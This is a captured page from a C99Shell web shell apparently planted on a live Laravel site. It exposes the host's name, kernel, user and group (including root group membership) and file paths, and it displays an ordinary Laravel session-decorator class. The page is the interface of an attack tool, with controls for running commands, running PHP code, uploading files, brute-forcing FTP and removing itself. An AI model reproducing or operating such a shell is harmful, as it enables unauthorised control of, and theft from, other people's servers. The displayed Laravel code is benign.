!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Session/   drwxr-xr-x
Free 28.69 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SymfonySessionDecorator.php (3.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Session;

use 
BadMethodCallException;
use 
Illuminate\Contracts\Session\Session;
use 
Symfony\Component\HttpFoundation\Session\SessionBagInterface;
use 
Symfony\Component\HttpFoundation\Session\SessionInterface;
use 
Symfony\Component\HttpFoundation\Session\Storage\MetadataBag;

class 
SymfonySessionDecorator implements SessionInterface
{
    
/**
     * The underlying Laravel session store.
     *
     * @var \Illuminate\Session\Store
     */
    
protected $store;

    
/**
     * Create a new session decorator.
     *
     * @param  \Illuminate\Contracts\Session\Session  $store
     * @return void
     */
    
public function __construct(Session $store)
    {
        
$this->store $store;
    }

    
/**
     * {@inheritdoc}
     */
    
public function start(): bool
    
{
        return 
$this->store->start();
    }

    
/**
     * {@inheritdoc}
     */
    
public function getId(): string
    
{
        return 
$this->store->getId();
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function setId(string $id)
    {
        
$this->store->setId($id);
    }

    
/**
     * {@inheritdoc}
     */
    
public function getName(): string
    
{
        return 
$this->store->getName();
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function setName(string $name)
    {
        
$this->store->setName($name);
    }

    
/**
     * {@inheritdoc}
     */
    
public function invalidate(?int $lifetime null): bool
    
{
        
$this->store->invalidate();

        return 
true;
    }

    
/**
     * {@inheritdoc}
     */
    
public function migrate(bool $destroy false, ?int $lifetime null): bool
    
{
        
$this->store->migrate($destroy);

        return 
true;
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function save()
    {
        
$this->store->save();
    }

    
/**
     * {@inheritdoc}
     */
    
public function has(string $name): bool
    
{
        return 
$this->store->has($name);
    }

    
/**
     * {@inheritdoc}
     */
    
public function get(string $namemixed $default null): mixed
    
{
        return 
$this->store->get($name$default);
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function set(string $namemixed $value)
    {
        
$this->store->put($name$value);
    }

    
/**
     * {@inheritdoc}
     */
    
public function all(): array
    {
        return 
$this->store->all();
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function replace(array $attributes)
    {
        
$this->store->replace($attributes);
    }

    
/**
     * {@inheritdoc}
     */
    
public function remove(string $name): mixed
    
{
        return 
$this->store->remove($name);
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function clear()
    {
        
$this->store->flush();
    }

    
/**
     * {@inheritdoc}
     */
    
public function isStarted(): bool
    
{
        return 
$this->store->isStarted();
    }

    
/**
     * {@inheritdoc}
     *
     * @return void
     */
    
public function registerBag(SessionBagInterface $bag)
    {
        throw new 
BadMethodCallException('Method not implemented by Laravel.');
    }

    
/**
     * {@inheritdoc}
     */
    
public function getBag(string $name): SessionBagInterface
    
{
        throw new 
BadMethodCallException('Method not implemented by Laravel.');
    }

    
/**
     * {@inheritdoc}
     */
    
public function getMetadataBag(): MetadataBag
    
{
        throw new 
BadMethodCallException('Method not implemented by Laravel.');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--